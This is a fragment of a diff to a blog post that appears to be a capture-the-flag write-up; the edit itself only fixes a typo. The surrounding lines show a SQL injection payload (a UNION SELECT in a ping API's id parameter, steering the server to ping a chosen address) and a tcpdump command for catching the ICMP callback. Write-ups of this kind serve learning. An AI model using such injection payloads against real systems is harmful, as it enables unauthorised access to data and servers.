0xDexter0us/blog/content/posts/ccc-h1ctf.md

 https://ccc.h1ctf.com/2b5d2b11513d2c9b/api/ping/?id=-1%20UNION%20SELECT%204%2c'127.0.0.1'%2c32%20--%20
 ```

-On our VPS we started to trace the ping with tcpdump and we got call back.
+On our VPS we started to trace the ping with tcpdump and we got a call back.
 ```bash
 tcpdump ip proto \\icmp
 ```